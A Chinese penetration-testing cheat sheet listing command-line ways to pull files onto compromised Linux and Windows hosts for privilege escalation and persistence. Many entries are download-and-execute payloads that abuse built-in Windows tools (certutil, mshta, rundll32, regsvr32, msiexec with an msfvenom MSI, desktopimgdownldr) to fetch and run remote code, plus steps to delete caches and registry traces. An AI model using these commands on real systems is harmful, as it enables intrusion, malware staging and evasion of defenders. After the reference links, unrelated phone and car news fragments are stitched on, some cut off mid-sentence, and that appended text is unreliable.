命令行终端下载指令大全(winlinux)
# 1. 简介
在我们渗透测试的过程中,通常会需要向目标主机传送一些文件,来达到提权,维持控制等目的。因此当不方便进行直接传输时,同时目标主机是能有网络连接的,那么此时就可以通过本地下载这种方法来达到文件传输的目的。此篇文章,我会对互联网上针对win与linux大部分的下载指令来做一个汇总,可能会有疏漏,但汇总的都是经常会用的。
# 2. Linux 2.1 Wget
这款工具功能很丰富,可以充当某种功能完备的GUI下载管理器,它拥有一款理想的下载管理器所需要的所有功能,比如它可以恢复下载,可以下载多个文件,出现某个连接问题后,可以重新尝试下载,你甚至可以管理最大的下载带宽。
直接下载:wget http://www.sample-videos.com/video/mp4/big.mp4
后台下载:wget -b http://www.sample-videos.com/video/mp4/big.mp4
如果互联网连接出现中断,恢复下载:wget -c http://www.sample-videos.com/video/mp4/big.mp4
从某个密码保护的ftp软件库下载文件:wget --ftp-user= --ftp-password= Download-url-address
2.2 Curl
Curl是另一种高效的下载工具,它可以用来上传或下载文件,只要使用一个简单的命令。它支持暂停和恢复下载程序包,并支持数量最多的Web协议,可预测下载完成还剩余多少时间,可通过进度条来显示下载进度。它是所有Linux发行版的内置工具。
直接下载:curl -o um.mp4 http://www.sample-videos.com/video/mp4/big.mp4
借助-o选项,提供名称,下载文件会以该名称保存;如使用-O选项,文件就会以原始名称保存。
2.3 Axel
这是wget的出色替代者,是一款轻量级下载实用工具。它实际上是个加速器,因为它打开了多路http连接,可下载独立文件片段,因而文件下载起来更快速。apt-get install axel
直接下载:axel http://www.sample-videos.com/video/mp4/big.mp4
2.4 Aria2
这是一种开源命令行下载加速器,支持多个端口,你可以使用最大带宽来下载文件,是一款易于安装、易于使用的工具。apt-get install aria2
直接下载:aria2c http://www.sample-videos.com/video/mp4/big.mp4
2.5 Perl
Perl是一门很吊的语言,使用它基本可以实现任何事情,用它实现文件下载也很简单。#!perl
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");
执行脚本文件是这样:perl test.pl
2.6 Python
Python也是很受欢迎的主流脚本语言,代码清晰且简洁:#!python
#!/usr/bin/python
import urllib2
u = urllib2.urlopen("http://domain/file")
localFile = open("local_file", "w")
localFile.write(u.read)
localFile.close
2.7 Ruby
Ruby是一个面对对象的语言,Metasploit框架就是用它来实现的,当然他也可以实现像下载文件这样的小任务。#!ruby
#!/usr/bin/ruby
require "net/http"
Net::HTTP.start("www.domain.com") { |http|
r = http.get("/file")
open("save_location", "wb") { |file|
file.write(r.body)
}
}
执行脚本文件是这样;ruby test.rb
2.8 PHP
PHP作为一种服务端脚本,也可以实现下载文件这种功能。#!/usr/bin/php
<?php
$data = @file("http://example.com/file");
$lf = "local_file";
$fh = fopen($lf, "w");
fwrite($fh, $data[0]);
fclose($fh);
?>
执行脚本文件是这样:php test.php
2.9 FTP
一般情况下攻击者使用FTP上传文件需要很多交互的步骤,下面这个 bash 脚本,考虑到了交互的情况,可以直接执行并不会产生交互动作。ftp 127.0.0.1
username
password
get file
exit
当然根据实际情况也可以进入交互终端:ftp 192.168.3.2
输入用户名和密码后
lcd E:file # 进入E盘下的file目录
cd www # 进入服务器上的www目录
get access.log # 将服务器上的access.log下载到E:file
2.10 Netcat
攻击者的电脑上输入:cat file | nc -l 1234
这个命令会将file的内容输出到本地的1234端口中,然后不论谁连接此端口,file的内容将会发送到连接过来的IP。
目标电脑上的命令:nc host_ip 1234 > file
这条命令将连接攻击者的电脑,接受file内容保存。
# 3. Windows 3.1 Powershell
PowerShell 是一种winodws原生的脚本语言,对于熟练使用它的人来说,可以实现很多复杂的功能。
下面这两条指令实现了从Internet网络下载一个文件。$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file" "C:%homepath%file")
3.2 IPC$copy 192.168.3.1c$ est.exe E:file
cmd.exe /k < webdavserverfolderbatchfile.txt
3.3 Certutil
可以应用到: Windows Server 2003, Windows Server 2003 R2, Windows Server 2003 with SP1, Windows Server 2003 with SP2certutil -urlcache -split -f http://192.168.3.1/test.exe file.exe
certutil -urlcache -split -f http://192.168.3.1/test.exe delete #删除缓存
certutil -verifyctl -split -f -split http://192.168.3.1/test.exe
#此条命令,会将原文件下载成为临时 bin 文件,把名字改回来一样可以正常运行
文件下载并执行如下:certutil -urlcache -split -f http://site.com/a a.exe && a.exe && del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete
3.4 Visual Basic
在1998年Visual Basic最终标准在windows上确定。下面的代码可以实现下载文件,虽然它的长度比Powershell长多了。Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 "
.open
.write xHttp.responseBody
.savetofile " C:%homepath%file", 2 "
end with
在windows中Cscript指令可以允许你执行VBS脚本文件或者对script脚本做一些设置。在windows 7中这个指令并不是必须要用到。但是在windows XP中需要使用这条指令,如下所示:cscript test.vbs
3.5 Tftp
在Windows Vista以及以后的版本中默认有FTP,可以使用以下命令运行:
上传:tftp -i IP地址 PUT C:%homepath%file 远程存放位置
下载:tftp -i IP地址 GET C:%homepath%file 本地存放位置
3.6 Bitsadmin
Bitsadmin是Windows命令行工具,用户可以使用它来创建下载或上传的任务。只能命令下载到指定路径上,win7以上:bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.203.140/b.ps1" "E:phpstudy_proWWWb.ps1"
bitsadmin /rawreturn /transfer getfile http://192.168.3.1/test.txt E:file est.txt
bitsadmin /rawreturn /transfer getpayload http://192.168.3.1/test.txt E:file est.txt
3.7 msiexecmsiexec /q /i http://192.168.3.1/calc.png
calc.png:
msfvenom -f msi -p windows/exec CMD=calc.exe > cacl.png
3.8 IEExecC:WindowsMicrosoft.NETFrameworkv2.0.50727> caspol -s off
C:WindowsMicrosoft.NETFrameworkv2.0.50727> IEExec http://192.168.3.1/test.exe
3.9 PythonC:python27python.exe -c "import urllib2; exec urllib2.urlopen(‘http://192.168.3.1/test.zip’).read;"
3.10 Mshta
mshta http://192.168.3.1/run.htarun.hta 内容如下:
demo
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
3.11 Rundll32
依赖于WScript.shell这个组件:rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write;h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8081/connect",false);try{h.Send;b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}%
3.12 Regsvr32
Regsvr32命令用于注册COM组件,是 Windows 系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行。
WinXP及以上系统的regsvr32.exe在windowssystem32文件夹下;2000系统的regsvr32.exe在winntsystem32文件夹下。regsvr32 /u /s /i:http://192.168.3.1/test.data scrobj.dll
test.data内容:<?XML version="1.0"?>
还可以利用 https://github.com/CroweCybersecurity/ps1encode 生成sct文件:regsvr32 /u /s /i:http://192.168.3.1/test.sct scrobj.dll
3.13 Windows Share
Windows shares可以加载一个驱动器,然后用命令来复制文件。
加载远程驱动:net use x: 127.0.0.1share /user:example.comuserID myPassword
3.14 格式转换
当需要把一个exe文件放到目标计算机上时,Nishang可以使用PowerShell允许你把一个exe转换成hex,然后把hex再转换成原来的exe文件:
把exe转成hex文件输入:PS > .ExetoText.ps1 evil.exe evil.txt
打开evil.txt文件,复制内容,然后通过RDP的剪贴板复制进目标计算机,把hex文件还原成exe文件输入:PS > .TexttoExe.ps1 evil.text evil.exe
3.15 其它
1.MSXSL.EXE
msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令。
2.pubprn.vbs在Windows 7以上版本存在一个名为PubPrn.vbs的微软已签名WSH脚本,其位于C:WindowsSystem32Printing_Admin_Scriptsen-US
3.esentutl.exe/extrac32.exeesentutl.exe /y "172.16.249.149share mimikatz_trunk.zip" /d"C:UsersPublicmimikatz_trunk.zip" /0
extrac32.exe /Y /C 172.16.249.149share est.txt C:UsersPublic est.txt
4.desktopimgdownldr.exedesktopimgdownldr.exe 位于 Win10 的 system32 文件夹中,原本用于设置锁定屏幕或桌面背景图像的。
普通用户可以用:set "SYSTEMROOT=C:ProgramData" && cmd /c desktopimgdownldr.exe /lockscreenurl:http://url/xxx.exe /eventName:desktopimgdownldr
这样来下载文件。
可以把C:ProgramData来改成一个普通用户可写的目录。
下载的文件存放于:C:ProgramDataPersonalizationLockScreenImagex_%random%.exe.
管理员用户会多写一个注册表项,所以管理员最好的命令是:set "SYSTEMROOT=C:ProgramData" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://url/file.exe /eventName:desktopimgdownldr && reg delete HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPersonalizationCSP /f
# 4. 参考链接
https://xz.aliyun.com/t/1654
https://www.t00ls.net/articles-49501.html
https://evi1cg.me/archives/remote_exec.html
https://www.unixmen.com/top-10-command-line-tools-downloading-linux/
作者:肖洋肖恩、
原文链接:https://www.cnblogs.com/-mo-/p/12109717.html
长安汽车在中级车发力,睿骋CC不到9万B级车开回家2017年12月20日,长安汽车在乌镇,互联网国际会展中心召开发布会,发布长安汽车旗下的重量级中级车长安睿骋CC正式上市。新车共分为七款车型,市场售价8。99万13。89万元。此外
机械师霸气引领游戏本全面屏时代3月29日,在北京筑中美术馆,人们共同期待着机械师带来的主题为心无界自在野的新品发布会。在这场发布会上机械师推出了首款全面屏游戏本F117Break,引发全网关注。下面让我们来看看
长安逸动家族双车上市越级质造演绎魅享传奇3月27日,长安汽车举行逸动之夜上市发布会,逸动家族第二代逸动逸动DT两款车型魅力上市。近两年,随着消费市场的转型和消费理念的不断升级,人们对中国品牌汽车的呼声日益高涨,随着第二代
石家庄医药产业晒家底石家庄是全国重要的生物医药产业基地,十三五规划确定的产业功能定位是以化学药物制剂为突破口,建设国家级高端制剂技术和产业增长极以传统中药技术现代化为方向,建设国内知名的现代中药技术及
河北平普科技六大数字平台实现农村全覆盖河北平普科技有限公司是一家专注于农业农村信息化建设与运营的大数据创新科技公司,公司现有人员200人,其中研发人员占比50,总部位于河北省会石家庄高新区。公司集产品研发解决方案运营培
河北又一牛股要上市,宜农科技科技金融为乡村赋能河北宜农科技股份有限公司成立2013年4月,注册地,中国(河北)自由贸易试验区正定片区石家庄综合保税区风洲路3号2129,技术研发中心在上海。2015年获战略投资,投资人包括嘉御基
西数京东开启战略合作!强强联手聚科技,赢未来,谋大同在移动智能设备呈现爆发式增长的今天,智能手机承载的使命早已不只是简单的沟通和社交,随着智能手机的性能飞速提升,以及拍照画质的突飞猛进,越来越多的消费者选择使用它畅玩大型游戏记录日常
腾讯长安联手建立合资公司,智能网联对抗上汽阿里4月12日,长安汽车与腾讯正式签署智能网联汽车合资合作协议,双方致力于在车联网大数据云计算等领域共同打造面相行业的开放平台,为汽车行业提供成熟完善的车联网整体方案,促进智能网联汽车
用科技演绎大自然艺术之美荣耀9XPro全息冰岛白图赏全息冰岛白这个设计灵感来自于冰岛的黄金瀑布,它是冰岛最大的峡谷瀑布,瀑布飞流直下,飞溅的水花雾气,再通过阳光的折射反射形成了彩虹,犹如一座七彩拱桥连接到仙境一般,它像童话故事中一样
亚洲最大马铃薯全产业链企业雪川农业察北智库雪川农业集团是一家以马铃薯种业为核心现代农业服务为延伸食品加工为龙头,集育繁推储加销为一体的马铃薯全产业链集团。雪川农业发展股份有限公司成立于2007年1月15日。当时,作
石家庄市组200亿基金支持信产,医药两大新兴产业7月7日,中共石家庄市委办公室石家庄市人民政府办公室印发关于支持新一代电子信息产业和生物医药产业率先突破的若干措施(试行)的通知。全文如下关于支持新一代电子信息产业和生物医药产业率
2020高颜值机型哪里找?这三款肯定能让你满意都说人类是视觉动物,一个东西外观常常会影响到我们对它的第一印象,在手机上也不例外。一款手机即使功能强大,但是如果没有一个足够出色的颜值,就很难让人下定决心入手他。如今2020年即将2020年Q4全球手机销量出炉!绿厂凭Reno5系列实力出圈2020年作为全球最难的一年,给各行各业带来的影响都不小,智能数码手机市场尤显。尽管手机市场十分萎靡,但复苏的进展依然势头很猛。近日,国际知名数据调研机构Canalys公布了202小米拉低骁龙888门槛,RedmiK40仅需2999元起继小米11首发搭载5nm制程芯片骁龙888后,iQOO7也定于1月11日发布搭载骁龙888的全新机型iQOO7,因此关于小米11和iQOO7到底谁更值得买,成为了网友热议的内容。笔这一功能减少了ampampquot电量焦虑ampampquot?OPPO超级省电模式初体验如今人们对于手机越发依赖,手机不离身的现象已经成为了常态,仿佛没有手机就等同于失去了聊天获取信息的途径,同时对于大家的日常娱乐和工作来说,手机也是非常重要的工具。在这样的基础上,人如何实现销量声量双赢?小米11在天猫超级品牌日做到了不久前,小米发布了全新一代数字旗舰小米11,在今年小米又与天猫超级品牌日进行开年合作,这将会一次科技与时尚的碰撞。之所以两者会进行合作,一方面是因为小米11的表现备受瞩目,同时天猫屏幕一般,续航缩水,这款手机能值3798元吗?就在昨天,也就是iQOO7发布的前几个小时的时间里,小米集团副总裁卢伟冰正式在其个人微博上对RedmiK40进行了预热,选在iQOO7即将发布的节点里预热RedmiK40自然是有自小米之家火速开店,实现两大省的县级全覆盖!卢伟冰真正实现承诺在去年11月的RedmiNote9系列发布会上,红米Redmi品牌总经理卢伟冰立了一个flag未来一年,让每个县城都有小米之家,让每个米粉身边都有小米之家。这对米粉们来说可是个好消千元机玩转一亿像素?解析OPPOA53的实拍效果曾经很多人对千元机总是抱有怀疑的态度,如今随着技术的进步,厂商制造工艺的提升,让千元也能带给用户带来超越其价值的体验。在这样的情况下,2020年手机厂商们也推出了许多千元机,众多千起个大早却赶个晚集,谁能比魅族惨?5月8日下午,魅族科技举办了魅族17的手机发布会。魅族17对魅族科技有着特殊的意义作为魅族的首款5G手机,担负着振兴魅族手机业务的重任。魅族科技曾是国内第一批做手机的厂家,早年凭借有钱人的电子世界就是这么朴实无华且枯燥最近在股市里挣了点小钱,看着手里破旧的手机,不禁想着是时候重新收拾一把行头了。为了体现哥不羁的特质,必须选一款最贵的手机。打开京东,啥都不选,直接上VERTU。恩,这款SIGNAT份额多还增长快,小米在欧洲表现太抢眼2月6日,Canalys发布了2020年Q4全球主要市场智能手机品牌排名,其中小米市场份额也维持住了全球第三,拥有的31同比增长实现了增速第一,受到了不少的关注。而许多人不了解的是